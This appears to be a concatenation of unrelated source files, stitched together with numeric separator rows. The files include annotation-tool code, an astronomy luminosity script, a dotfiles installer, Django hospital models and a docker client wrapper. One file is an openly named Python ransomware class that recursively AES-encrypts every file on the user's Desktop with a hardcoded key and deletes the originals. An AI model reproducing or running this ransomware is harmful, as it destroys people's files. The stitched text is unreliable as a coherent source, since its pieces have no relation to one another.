l = a(q, kv, biases=bias, use_lma=True)
real = a(q, kv, biases=bias)
self.assertTrue(torch.max(torch.abs(l - real)) < consts.eps)
if __name__ == "__main__":
unittest.main()
| 1,598 | 552 |
from projectconfig import TypeHierarchyNode, ProjectConfiguration
from annotation import Annotations,TextLevelAnnotation, SimpleAnnotations
from message import Messager
from ApplicationScope import getAnnObject
class NoTextLevelConf(Exception):
def __init__(self):
Exception.__init__(self)
def __str__(self):
return u'No text level annotations defined in configuration'
class noValidAnswer(Exception):
def __init__(self,answer):
Exception.__init__(self)
self.answer = answer
def __str__(self):
return u'%s is not a valid answer'%(self.answer)
class noValidNextStep(Exception):
def __init__(self,next_step):
Exception.__init__(self)
self.next_step = next_step
def __str__(self):
return u'%s is not a valid next step, check configuration'%(self.next_step)
class TextAnnotations(object):
'''this is the main class for annotations on textlevel
It will read the projectconf and make all necesary classes.
'''
def __init__(self,projectconf, ann=""):
self.projectconf = projectconf
self.lists = {}
self.defs = {}
self.startlists = {}
self.selectedList = None
#ann is not the entire Annotations object but only a list of textLevel annotations
self.ann = ann
text_types = []
try:
text_types = self.projectconf.get_text_type_hierarchy()
except KeyError:
raise NoTextLevelConf()
for i in text_types:
if i.terms[0] == "Def":
answer = Answer(i.arguments["id"][0], i.arguments["text"][0])
self.defs[answer.id] = answer
elif i.terms[0] == "List":
answers = {}
nexts = {}
index = 0
for answer in i.arguments["defs"]:
answers[answer] = self.defs[answer]
nexts[answer] = i.arguments["next"][index]
index += 1
lst = AnswerList(i.arguments["id"][0], i.arguments["name"][0],answers,nexts)
self.lists[lst.id] = lst;
self.startlists[lst.id] =StartList(self.defs,self.lists,lst)
elif i.terms[0] == "SubList":
answers = {}
index = 0
check = False
if "checkboxes" in i.arguments and i.arguments["checkboxes"][0] == "True":
check = True
for answer in i.arguments["defs"]:
answers[answer] = self.defs[answer]
if not check:
nexts[answer] = i.arguments["next"][index]
index += 1
else:
nexts[answer] = i.arguments["next"][0]
lst = AnswerList(i.arguments["id"][0], i.arguments["name"][0],answers,nexts,True,check)
self.lists[lst.id] = lst
for annotation in self.ann:
#TODO:Correct error if type is not found
for i in self.startlists:
if self.startlists[i].start.name == annotation.type:
self.startlists[i].set_ann(annotation)
break
def set_ann(self, annotations):
self.ann = annotations
for annotation in self.ann:
#TODO:Correct error if type is not found
for i in self.startlists:
if self.startlists[i].start.name == annotation.type:
self.startlists[i].set_ann(annotation)
break
def select(self,_id,start_list=None,current_list=None):
#~ if not self.selectedList and not start_list:
#~ self.selectedList = self.startlists[_id[0]]
#~ return self.startlists[_id[0]].currentList
if not start_list:
self.selectedList = self.startlists[_id[0]]
return self.startlists[_id[0]].start
elif start_list:
self.selectedList = self.startlists[start_list]
return self.selectedList.select(_id,current_list)
def unselect(self,start_list, current_id):
self.selectedList = self.startlists[start_list]
if self.selectedList.followed_path:
return self.selectedList.unselect(current_id)
else:
return None
class StartList(object):
def __init__(self,defs,lists,currentList, ann=""):
self.defs = defs
self.lists = lists
self.start = currentList
self.currentList = currentList
self.followed_path = []
self.ann = ann
def set_ann(self, annotation):
self.ann = annotation
if self.ann:
for id_ in self.ann.ids:
ids = id_.split(';')
if 'input' in ids:
text = self.ann.tail.split("|")[-1]
self.currentList.set_input(text)
self.followed_path.append(self.currentList.id)
else:
self.select(ids,self.currentList.id)
def select(self,_id,current_list):
try:
next_step,changed = self.lists[current_list].select(_id)
except:
raise
#Will remove all following answers if one is changed
if changed:
found = False
new_path = []
for i in self.followed_path:
if found:
self.lists[i].clear()
else:
new_path.append(i)
if i == current_list:
found = True
self.followed_path = new_path
if not current_list in self.followed_path :
self.followed_path.append(current_list)
if(not next_step == "stop"):
try:
self.currentList = self.lists[next_step]
except:
raise noValidNextStep(next_step)
else:
self.currentList = "stop"
#~ if not self.currentList == "stop":
#~ try:
#~ next_step = self.currentList.select(_id)
#~ except:
#~ raise noValidAnswer(_id)
#~ self.followed_path.append(self.currentList.id)
#~ if(not next_step == "stop"):
#~ try:
#~ self.currentList = self.lists[next_step]
#~ except:
#~ raise noValidNextStep(next_step)
#~ else:
#~ self.currentList = "stop"
return self.currentList
def unselect(self, current_id):
index = 0
found = False
if current_id == 'stop':
self.currentList = self.lists[self.followed_path[-1]]
return self.currentList
for i in self.followed_path:
if i == current_id:
found = True
break
index += 1
if index == 0:
return None
index -= 1
self.currentList = self.lists[self.followed_path[index]]
#~ self.currentList = self.start
#~ if self.ann and len(self.ann.ids) >= 1:
#~ for id_ in self.ann.ids[:-1]:
#~ self.select(id_.split(';'),self.currentList.id)
return self.currentList
class AnswerList(object):
#Has an id to identify the object and a name.
#Keeps a list of possible answers, and for every answer there is an value that gives says what the next_step is
#this can be the id of an other (sub)list or can be "stop"
def __init__(self,id, name,answers,next_steps, sublist=False, checkboxes=False):
self.name = name
self.id = id
self.answers = answers
self.nexts = next_steps
self.sublist = sublist
self.checkboxes = checkboxes
self.answerids = []
self.answertext = []
def select(self,_id):
changed = False
if not self.checkboxes and self.answerids and not self.nexts[_id[0]] == self.nexts[self.answerids[0]]:
changed = True
self.answerids = []
self.answertext = []
for i in _id:
#i can be empty if no answers were selected in the checkboxes
if i:
self.answerids.append(i)
self.answertext.append(self.answers[i].text)
#this only works for checkboxes and is needed because _id doesn't always contain a value
if self.checkboxes :
for i in self.nexts:
return self.nexts[i],changed
return self.nexts[_id[0]],changed
def set_input(self, _input):
self.answerids = ['input']
self.answertext = [_input]
def get_ids(self):
return ';'.join(self.answerids)
def get_texts(self):
return ';'.join(self.answertext)
def clear(self):
self.answerids = []
self.answertext = []
def __str__(self):
return u'%s\t%s' % (self.id,self.name)
class Answer(object):
def __init__(self,id, text):
self.id = id
self.text = text
def __str__(self):
return u'%s\t%s' % (self.id,self.text)
def get_list(path,doc):
try:
from os.path import join as path_join
from document import real_directory
real_dir = real_directory(path)
except:
real_dir=path
ann =getAnnObject(path,doc)
proj = ProjectConfiguration(real_dir)
try:
txt_lvl = TextAnnotations(proj,ann.get_textLevels())
except NoTextLevelConf as e:
return {'exception' :str(e) }
#~ if txt_lvl.currentList == "stop":
#~ return {'stop':True, 'annotation':str(txt_lvl.selectedList.ann),}
response = list_to_dict(txt_lvl.selectedList.currentList)
#Back_pos tells if there is still atleast 1 answer left that can be removed
response["back_pos"] = False
if len(txt_lvl.followed_path) >0 :
response["back_pos"] = True
return response
def get_startlist(path,doc):
try:
from os.path import join as path_join
from document import real_directory
real_dir = real_directory(path)
except:
real_dir=path
ann =getAnnObject(path,doc)
proj = ProjectConfiguration(real_dir)
try:
txt_lvl = TextAnnotations(proj,ann.get_textLevels())
except NoTextLevelConf as e:
return {'exception' :str(e) }
response = startlist_to_dict(txt_lvl.startlists)
#Back_pos tells if there is still atleast 1 answer left that can be removed
response["back_pos"] = False
return response
def select(path,doc,_id,start_list=None, current_list=None):
try:
from os.path import join as path_join
from document import real_directory
real_dir = real_directory(path)
except:
real_dir=path
proj = ProjectConfiguration(real_dir)
try:
import simplejson as json
_id = json.loads(_id)
txt_lvl = TextAnnotations(proj)
if start_list:
answerlist = txt_lvl.startlists[start_list].start
with getAnnObject(path, doc) as ann:
ann_txtLvl = ann.get_textLevels()
annotation = None
for i in ann_txtLvl:
if i.type == answerlist.name:
annotation = i
if not annotation:
ann_id = ann.get_new_id('F')
ann.add_annotation(TextLevelAnnotation(ann_id, answerlist.name,[]))
annotation = ann.get_ann_by_id(ann_id)
ann_txtLvl = ann.get_textLevels()
txt_lvl.set_ann(ann_txtLvl)
response = txt_lvl.select(_id,start_list,current_list)
update_annotations(ann,annotation, txt_lvl.startlists[start_list])
else:
ann = getAnnObject(path,doc)
ann_txtLvl = ann.get_textLevels()
if ann_txtLvl:
txt_lvl.set_ann(ann_txtLvl)
response = txt_lvl.select(_id,start_list)
except Exception,e :
raise
return {'exception' :str(e) }
if response == "stop":
return {'stop':True , 'annotation':str(txt_lvl.selectedList.ann),}
return list_to_dict(response)
def unselect(path,doc,start_list, current_id):
try:
from os.path import join as path_join
from document import real_directory
real_dir = real_directory(path)
except:
real_dir=path
from message import Messager
with getAnnObject(path, doc) as ann:
proj = ProjectConfiguration(real_dir)
ann_txtLvls = ann.get_textLevels()
if not ann_txtLvls:
return get_startlist(path,doc)
txt_lvl = TextAnnotations(proj,ann_txtLvls)
response_list = txt_lvl.unselect(start_list,current_id)
#answerlist = txt_lvl.startlists[start_list].start
#~ for i in ann_txtLvls:
#~ if i.type == answerlist.name:
#~ update_annotations(ann,i, txt_lvl.startlists[start_list])
#~ break
if response_list:
response = list_to_dict(response_list)
else:
response = get_startlist(path,doc)
return response
def input_text(path,doc,_id,text,start_list, current_list=None):
try:
from os.path import join as path_join
from document import real_directory
real_dir = real_directory(path)
except:
real_dir=path
proj = ProjectConfiguration(real_dir)
txt_lvl = TextAnnotations(proj)
answerlist = txt_lvl.startlists[start_list].start
with getAnnObject(path, doc) as ann:
ann_txtLvls = ann.get_textLevels()
annotation = None
for i in ann_txtLvls:
if i.type == answerlist.name:
annotation = i
if annotation:
txt_lvl.set_ann(ann_txtLvls)
else:
ann_id = ann.get_new_id('F')
ann.add_annotation(TextLevelAnnotation(ann_id, answerlist.name,[]))
annotation = ann.get_ann_by_id(ann_id)
#~ ann_txtLvls = ann.get_textLevels()
#~ if annotation.tail:
#~ annotation.tail += ";"
txt_lvl.startlists[start_list].currentList.set_input(text)
txt_lvl.startlists[start_list].currentList = 'stop'
if not current_list in txt_lvl.startlists[start_list].followed_path:
txt_lvl.startlists[start_list].followed_path.append(current_list)
update_annotations(ann,annotation, txt_lvl.startlists[start_list])
#~ annotation.tail += text
#~ annotation.ids.append(_id)
return {'stop':True, 'annotation':str(annotation),}
def update_annotations(ann,ann_txtLvl, txt_lvl):
#update annotation for file
if len(txt_lvl.followed_path) == 0:
ann.del_annotation(ann_txtLvl)
return 0
ann_txtLvl.tail = ""
ann_txtLvl.ids = []
for i in txt_lvl.followed_path:
ann_txtLvl.tail += txt_lvl.lists[i].get_texts()+'|'
ann_txtLvl.ids.append(txt_lvl.lists[i].get_ids())
#remove extra ";" at end
if ann_txtLvl.tail:
ann_txtLvl.tail=ann_txtLvl.tail[:-1]
def list_to_dict(answer_list):
response = {'name':answer_list.name, 'id':answer_list.id, 'nexts':answer_list.nexts, 'sublist':answer_list.sublist,
'stop':False, 'checkboxes':answer_list.checkboxes,}
keys = answer_list.answers.keys()
keys.sort()
response['answer_ids'] = [ a for a in keys ]
response['answer_texts'] = [ answer_list.answers[a].text for a in keys ]
if 'input' in answer_list.answerids:
response['answers']= answer_list.answertext[0]
else:
response['answers']= answer_list.answerids
response["back_pos"] = True
return response
def startlist_to_dict(answer_list):
response = {'name':'', 'id':'', 'answers':[], 'sublist':False, 'stop':False,'checkboxes':False}
#a is the id
keys = answer_list.keys()
keys.sort()
response['answer_ids'] = [ a for a in keys ]
response['answer_texts'] = [ answer_list[a].start.name for a in keys ]
return response
if __name__ == "__main__":
proj = ProjectConfiguration("/home/sander/Documents/Masterproef/brat/data/brat_vb/sentiment")
#~ proj.get_text_type_hierarchy()
#ann = Annotations("/home/sander/Documents/Masterproef/brat/data/brat_vb/sentiment/sporza")
#textann = TextAnnotations(proj,ann.get_textLevels())
#print textann.select(['0.2'],'0')
#print textann.select(['1.2','1.3'],'0')
#print textann.select(['5.2'],'0')
#~ print "STARTLISTS"
#~ print "###################"
#~ print
#~ print "LISTS"
#~ print textann.lists
#~ print "###################"
#~ print
#~ print "DEFS"
#~ print textann.defs
#~ print "###################"
#~ print "#####SELECT########"
#~ print textann.select('0.2','0')
#detijd_other_Bekaert_12-05-05
#~ import cProfile
#~ cProfile.run('get_startlist("/brat_vb/sentiment/","sporza")')
print get_list("/voorbeeld/","sporza")
#~ print select('/brat_vb/sentiment/','sporza','0')
#~ #print "#####UNSELECT#######"
#~ print unselect('/brat_vb/sentiment/','sporza','0')
#~ print select('/brat_vb/sentiment/','sporza','0.1','0')
| 17,315 | 5,245 |
a =3
b = "tim"
c = 1, 2, 3
print(a)
print(b)
print(c)
| 55 | 38 |
import pandas as pd
import numpy as np
import math
from dust_extinction.parameter_averages import F19
def extinction_adjustment(rv):
len_wave=len(sn_templ['Wavelength'])
wavenum_waves = [1/(a/10000) for a in sn_templ['Wavelength']]
ext_model = F19(Rv=rv)
return(pd.Series(ext_model(wavenum_waves)))
def Dm_to_Lum(sn_name):
def Grab_Lum(Dist_mod, Flux):
P_cm= 3.08567758128*10**(18)
D_cm= 10**((Dist_mod/5)+1)*P_cm
S_a= 4*np.pi*D_cm**2
lum= Flux*S_a
return lum
idex= swift.loc[swift.isin([sn_name]).any(axis=1)].index.tolist()
idex=idex[0]
Dist_mod= swift['Dist_mod_cor'][idex]
Lum= pd.Series(sn_templ.apply(lambda row: Grab_Lum(Dist_mod=Dist_mod, Flux= row['Flux']), axis=1))
Lum=Lum/extinction_adjustment(3.1)
Lum=pd.DataFrame({'MJD': sn_templ['MJD'], 'Wavelength': sn_templ['Wavelength'], 'Luminosity': Lum.tolist()})
return Lum
def Lum_conv(sn_name,output_file):
global swift
swift= pd.read_csv('../input/NewSwiftSNweblist.csv')
global sn_templ
'''Input desired template file name with Flux'''
sn_templ= pd.read_csv(output_file)
sn_name= sn_name.replace("_uvot","")
'''Input name of supernovae'''
lum_templ= Dm_to_Lum(sn_name)
return lum_templ
if __name__ == "__main__":
l=Lum_conv('SN2005cs_uvot','../output/TEMPLATE/SN2005cs_uvot_SNIa_series_template.csv')
# print(type(l))
# extinction_adjustment(3.1) | 1,466 | 639 |
#!/usr/bin/env python3
from __future__ import print_function
# Copyright (C) 2015 Vibhav Pant <vibhavp@gmail.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import json
import os
import shutil
from sys import stderr
import argparse
# Fix Python 2.x.
try: input = raw_input
except NameError: pass
def ask_user(prompt):
valid = {"yes":True, 'y':True, '':True, "no":False, 'n':False}
while True:
print("{0} ".format(prompt),end="")
choice = input().lower()
if choice in valid:
return valid[choice]
else:
print("Enter a correct choice.", file=stderr)
def create_directory(path):
exp = os.path.expanduser(path)
if (not os.path.isdir(exp)):
print("{0} doesnt exist, creating.".format(exp))
os.makedirs(exp)
def create_symlink(src, dest, replace):
dest = os.path.expanduser(dest)
src = os.path.abspath(src)
broken_symlink = os.path.lexists(dest) and not os.path.exists(dest)
if os.path.lexists(dest):
if os.path.islink(dest) and os.readlink(dest) == src:
print("Skipping existing {0} -> {1}".format(dest, src))
return
elif replace or ask_user("{0} exists, delete it? [Y/n]".format(dest)):
if os.path.isfile(dest) or broken_symlink or os.path.islink(dest):
os.remove(dest)
else:
shutil.rmtree(dest)
else:
return
print("Linking {0} -> {1}".format(dest, src))
try:
os.symlink(src, dest)
except AttributeError:
import ctypes
symlink = ctypes.windll.kernel32.CreateSymbolicLinkW
symlink.argtypes = (ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
symlink.restype = ctypes.c_ubyte
flags = 1 if os.path.isdir(src) else 0
symlink(dest, src, flags)
def copy_path(src, dest):
dest = os.path.expanduser(dest)
src = os.path.abspath(src)
if os.path.exists(dest):
if ask_user("{0} exists, delete it? [Y/n]".format(dest)):
if os.path.isfile(dest) or os.path.islink(dest):
os.remove(dest)
else:
shutil.rmtree(dest)
else:
return
print("Copying {0} -> {1}".format(src, dest))
if os.path.isfile(src):
shutil.copy(src, dest)
else:
shutil.copytree(src, dest)
def run_command(command):
print("Running {0}".format(command))
os.system(command)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("config", help="the JSON file you want to use")
parser.add_argument("-r", "--replace", action="store_true",
help="replace files/folders if they already exist")
args = parser.parse_args()
js = json.load(open(args.config))
os.chdir(os.path.expanduser(os.path.abspath(os.path.dirname(args.config))))
if 'directories' in js: [create_directory(path) for path in js['directories']]
if 'link' in js: [create_symlink(src, dst, args.replace) for src, dst in js['link'].items()]
if 'copy' in js: [copy_path(src, dst) for src, dst in js['copy'].items()]
if 'install' in js and 'install_cmd' in js:
packages = ' '.join(js['install'])
run_command("{0} {1}".format(js['install_cmd'], packages))
if 'commands' in js: [run_command(command) for command in js['commands']]
print("Done!")
if __name__ == "__main__":
main()
| 4,076 | 1,362 |
import os
import sys
from pathlib import Path
from sltxpkg import globals as sg
from sltxpkg import util as su
from sltxpkg.globals import (C_CACHE_DIR, C_CREATE_DIRS, C_DOWNLOAD_DIR, C_DRIVER_LOG,
C_TEX_HOME, C_WORKING_DIR)
from sltxpkg.log_control import LOGGER
from sltxpkg.types import SltxDependencies
def write_to_log(data: str):
if sg.configuration[C_DRIVER_LOG].strip():
with open(sg.configuration[C_DRIVER_LOG], 'a') as f:
f.write(data)
if not data.endswith('\n'):
f.write("\n")
def load_configuration(file: str):
"""Apply given configuration file to the sltx config
Args:
file (str): The configuration file to load
"""
y_conf = su.load_yaml(file)
sg.configuration = {**sg.configuration, **y_conf}
def expand_url(path: str, cwd: Path) -> str:
return "" if path is None else path.format(cwd=str(cwd.parent))
def load_dependencies_config(file: str, target: dict) -> SltxDependencies:
"""Apply given dependency file to the sltx dep list
Args:
file (str): The file to load
target (dict): The target dependency-collection to append it to (won't be modified)
Returns:
dict: The target dict with the added dependencies
"""
y_dep = su.load_yaml(file)
if 'dependencies' in y_dep:
for dep in y_dep['dependencies']:
dep_data = y_dep['dependencies'][dep]
if 'url' in dep_data:
dep_data['url'] = expand_url(
dep_data['url'], Path(file).absolute())
return {**target, **y_dep}
def assure_dir(name: str, target_path: str, create: bool):
if not os.path.isdir(target_path):
if create:
LOGGER.info("> %s: %s not found. Creating...", name, target_path)
os.makedirs(target_path)
else:
LOGGER.error("! Not allowed to create " + name + ". Exit")
sys.exit(1)
def assure_dirs():
sg.configuration[C_TEX_HOME] = su.get_sltx_tex_home() # expansion
create = sg.configuration[C_CREATE_DIRS]
assure_dir('Tex-Home', sg.configuration[C_TEX_HOME], create)
for config, name in [(C_WORKING_DIR, 'Working-Dir'), (C_DOWNLOAD_DIR, 'Download-Dir'),
(C_CACHE_DIR, 'Cache-Dir')]:
sg.configuration[config] = os.path.expanduser(
sg.configuration[config]) # expansion
assure_dir(name, sg.configuration[config], create)
| 2,472 | 820 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 24 21:32:11 2020
@author: kw
"""
import glob
import os, random, struct
import getpass
from Cryptodome.Cipher import AES
class makeMyRansomware:
def __init__(self, your_extension=".Example", key=b'keyfor16bytes123', username=getpass.getuser()):
self.your_extension = your_extension
self.key = key
self.username = username
def encrypt_file(self, key, in_filename, out_filename=None, chunksize=64*1024):
if not out_filename:
out_filename = in_filename + self.your_extension
iv = os.urandom(16)
encryptor = AES.new(key ,AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
def decrypt_file(self, key, in_filename, out_filename=None, chunksize=24*1024):
if not out_filename:
out_filename = os.path.splitext(in_filename)[0]
with open(in_filename, 'rb') as infile:
origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
iv = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, iv)
with open(out_filename, 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
outfile.write(decryptor.decrypt(chunk))
outfile.truncate(origsize)
def Encryptor(self, startPath):
for filename in glob.iglob(startPath, recursive=True):
if(os.path.isfile(filename)):
print('Encrypting> ' + filename)
self.encrypt_file(self.key, filename)
os.remove(filename)
def Decryptor(self, startPath):
for filename in glob.iglob(startPath, recursive=True):
if(os.path.isfile(filename)):
fname, ext = os.path.splitext(filename)
if (ext == self.your_extension):
print('Decrypting> ' + filename)
self.decrypt_file(self.key, filename)
os.remove(filename)
if __name__ == "__main__":
import time
Ransom1 = makeMyRansomware(".Hello")
startpath = 'c:/Users/'+Ransom1.username+'/Desktop/**'
#You can encrypt or decrypt like this
Ransom1.Encryptor(startpath)
Ransom1.Decryptor(startpath) | 2,896 | 933 |
import uuid
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator
from landing.models import Profile
class Specialisation(models.Model):
class Meta:
ordering = ('id',)
verbose_name = 'specialisation'
verbose_name_plural = 'specialisations'
id = models.CharField(unique=True, default=uuid.uuid4,
editable=False, max_length=50, primary_key=True)
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Hospital(models.Model):
class Meta:
ordering = ('-rating',)
verbose_name = 'Hospital'
verbose_name_plural = 'Hospitals'
user = models.OneToOneField(User, on_delete=models.CASCADE)
name = models.CharField(max_length=1000, null=True, blank=True)
address = models.TextField(max_length=5000, null=True, blank=True)
slug = models.SlugField(unique=True, null=True, blank=True)
rating = models.PositiveSmallIntegerField(default=3, validators=[
MaxValueValidator(5),
MinValueValidator(1),
])
phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$',
message="Phone number must be entered in the format:"
" '+919999999999'.")
email = models.EmailField(blank=True, help_text="Please enter valid email address, it will be used for "
"verification.")
phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True, help_text="Please enter "
"valid phone "
"number.")
specialisation = models.ManyToManyField(Specialisation, related_name='speciality_of_hospital')
verified = models.BooleanField(default=False)
def __str__(self):
return self.user.first_name
def get_url(self):
return reverse('hospital:overview', args=[self.slug])
def get_all_spec(self):
specs = ""
for spec in self.specialisation.all():
specs += spec.name + ", "
return specs[:-2]
class Doctor(models.Model):
class Meta:
ordering = ('name',)
verbose_name = 'Doctor'
verbose_name_plural = 'Doctors'
user = models.OneToOneField(User, on_delete=models.CASCADE)
name = models.CharField(max_length=1000, null=True, blank=True)
address = models.TextField(max_length=5000, null=True, blank=True)
slug = models.SlugField(unique=True, null=True, blank=True)
rating = models.PositiveSmallIntegerField(default=3, validators=[
MaxValueValidator(5),
MinValueValidator(1),
])
hospital = models.ForeignKey(Hospital, related_name='doctor', on_delete=models.CASCADE)
specialisation = models.ManyToManyField(Specialisation, related_name='speciality')
def __str__(self):
return self.name
def get_url(self):
return reverse('hospital:doctor-home', args=[self.slug])
def get_all_spec(self):
specs = ""
for spec in self.specialisation.all():
specs += spec.name + ", "
return specs[:-2]
class Appointment(models.Model):
class Meta:
ordering = ('-start_date',)
verbose_name = 'Appointment'
verbose_name_plural = 'Appointments'
id = models.CharField(unique=True, default=uuid.uuid4,
editable=False, max_length=50, primary_key=True)
doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE, null=True)
patient = models.ForeignKey(Profile, on_delete=models.CASCADE, null=True)
start_date = models.DateTimeField(blank=True, null=True,
help_text="You can choose dates from now")
end_date = models.DateTimeField(blank=True, null=True,
help_text="You can choose appointment "
"duration as maximum of 7 days")
patients_remarks = models.TextField(blank=True, null=True)
doctors_remarks = models.TextField(blank=True, null=True)
approved = models.BooleanField(default=False)
rejected = models.BooleanField(default=False)
rejection_cause = models.TextField(max_length=20000, blank=True, null=True)
def __str__(self):
return str(self.doctor.name + "-" + self.patient.user.first_name)
def get_start_date(self):
return self.start_date.date()
def get_end_date(self):
return self.end_date.date()
| 4,756 | 1,387 |
import os
import json
json_files = set()
errors = set()
dir = "extracted/json/"
for file in os.listdir(dir):
if ".json" in file:
json_files.add(file)
with open(dir + file, "r") as f:
j = json.loads("".join(f.read()))
if j["entities"] == {} or j["text"] == "":
errors.add(file)
print(errors or "All good. Scanned files: " + str(len(json_files)))
| 409 | 141 |
__author__ = 'rcj1492'
__created__ = '2016.03'
__license__ = 'MIT'
from labpack.handlers.requests import requestsHandler
class dockerClient(requestsHandler):
_class_fields = {
'schema': {
'virtualbox_name': '',
'container_alias': '',
'image_name': '',
'image_tag': '',
'image_id': '',
'sys_command': '',
'environmental_variables': {},
'envvar_key': '',
'envvar_value': '',
'mapped_ports': {},
'port_key': '1000',
'port_value': '1000',
'mounted_volumes': {},
'mount_field': '',
'start_command': '',
'network_name': '',
'run_flags': ''
},
'components': {
'.envvar_key': {
'must_contain': [ '^[a-zA-Z_][a-zA-Z0-9_]+$' ],
'max_length': 255
},
'.envvar_value': {
'max_length': 32767
},
'.port_key': {
'contains_either': [ '\d{2,5}', '\d{2,5}\-\d{2,5}' ]
},
'.port_value': {
'contains_either': [ '\d{2,5}', '\d{2,5}\-\d{2,5}' ]
}
}
}
def __init__(self, virtualbox_name='', verbose=False):
'''
a method to initialize the dockerClient class
:param virtualbox_name: [optional] string with name of virtualbox image
:return: dockerClient object
'''
title = '%s.__init__' % self.__class__.__name__
# construct super
super(dockerClient, self).__init__()
# construct fields model
from jsonmodel.validators import jsonModel
self.fields = jsonModel(self._class_fields)
# validate inputs
input_fields = {
'virtualbox_name': virtualbox_name
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct properties
self.vbox = virtualbox_name
self.verbose = verbose
# construct localhost
from labpack.platforms.localhost import localhostClient
self.localhost = localhostClient()
# verbosity
if self.verbose:
print('Checking docker installation...', end='', flush=True)
# validate docker installation
self._validate_install()
if self.verbose:
print('.', end='', flush=True)
# validate virtualbox installation
self.vbox_running = self._validate_virtualbox()
if self.verbose:
print('.', end='', flush=True)
# set virtualbox variables
if self.vbox_running:
self._set_virtualbox()
if self.verbose:
print('.', end='', flush=True)
if self.verbose:
print(' done.')
def _validate_install(self):
''' a method to validate docker is installed '''
from subprocess import check_output, STDOUT
sys_command = 'docker --help'
try:
check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
# call(sys_command, stdout=open(devnull, 'wb'))
except Exception as err:
raise Exception('"docker" not installed. GoTo: https://www.docker.com')
return True
def _validate_virtualbox(self):
'''
a method to validate that virtualbox is running on Win 7/8 machines
:return: boolean indicating whether virtualbox is running
'''
# validate operating system
if self.localhost.os.sysname != 'Windows':
return False
win_release = float(self.localhost.os.release)
if win_release >= 10.0:
return False
# validate docker-machine installation
from os import devnull
from subprocess import call, check_output, STDOUT
sys_command = 'docker-machine --help'
try:
check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
except Exception as err:
raise Exception('Docker requires docker-machine to run on Win7/8. GoTo: https://www.docker.com')
# validate virtualbox is running
sys_command = 'docker-machine status %s' % self.vbox
try:
vbox_status = check_output(sys_command, shell=True, stderr=open(devnull, 'wb')).decode('utf-8').replace('\n', '')
except Exception as err:
if not self.vbox:
raise Exception('Docker requires VirtualBox to run on Win7/8. GoTo: https://www.virtualbox.org')
elif self.vbox == "default":
raise Exception('Virtualbox "default" not found. Container will not start without a valid virtualbox.')
else:
raise Exception('Virtualbox "%s" not found. Try using "default" instead.' % self.vbox)
if 'Stopped' in vbox_status:
raise Exception('Virtualbox "%s" is stopped. Try first running: docker-machine start %s' % (self.vbox, self.vbox))
return True
def _set_virtualbox(self):
'''
a method to set virtualbox environment variables for docker-machine
:return: True
'''
from os import environ
if not environ.get('DOCKER_CERT_PATH'):
import re
sys_command = 'docker-machine env %s' % self.vbox
cmd_output = self.command(sys_command)
variable_list = ['DOCKER_TLS_VERIFY', 'DOCKER_HOST', 'DOCKER_CERT_PATH', 'DOCKER_MACHINE_NAME']
for variable in variable_list:
env_start = '%s="' % variable
env_end = '"\\n'
env_regex = '%s.*?%s' % (env_start, env_end)
env_pattern = re.compile(env_regex)
env_statement = env_pattern.findall(cmd_output)
env_var = env_statement[0].replace(env_start, '').replace('"\n', '')
environ[variable] = env_var
return True
def _images(self, sys_output):
''' a helper method for parsing docker image output '''
import re
gap_pattern = re.compile('\t|\s{2,}')
image_list = []
output_lines = sys_output.split('\n')
column_headers = gap_pattern.split(output_lines[0])
for i in range(1,len(output_lines)):
columns = gap_pattern.split(output_lines[i])
if len(columns) == len(column_headers):
image_details = {}
for j in range(len(columns)):
image_details[column_headers[j]] = columns[j]
image_list.append(image_details)
return image_list
def _ps(self, sys_output):
''' a helper method for parsing docker ps output '''
import re
gap_pattern = re.compile('\t|\s{2,}')
container_list = []
output_lines = sys_output.split('\n')
column_headers = gap_pattern.split(output_lines[0])
for i in range(1,len(output_lines)):
columns = gap_pattern.split(output_lines[i])
container_details = {}
if len(columns) > 1:
for j in range(len(column_headers)):
container_details[column_headers[j]] = ''
if j <= len(columns) - 1:
container_details[column_headers[j]] = columns[j]
# stupid hack for possible empty port column
if container_details['PORTS'] and not container_details['NAMES']:
from copy import deepcopy
container_details['NAMES'] = deepcopy(container_details['PORTS'])
container_details['PORTS'] = ''
container_list.append(container_details)
return container_list
def _synopsis(self, container_settings, container_status=''):
''' a helper method for summarizing container settings '''
# compose default response
settings = {
'container_status': container_settings['State']['Status'],
'container_exit': container_settings['State']['ExitCode'],
'container_ip': container_settings['NetworkSettings']['IPAddress'],
'image_name': container_settings['Config']['Image'],
'container_alias': container_settings['Name'].replace('/',''),
'container_variables': {},
'mapped_ports': {},
'mounted_volumes': {},
'container_networks': []
}
# parse fields nested in container settings
import re
num_pattern = re.compile('\d+')
if container_settings['NetworkSettings']['Ports']:
for key, value in container_settings['NetworkSettings']['Ports'].items():
if value:
port = num_pattern.findall(value[0]['HostPort'])[0]
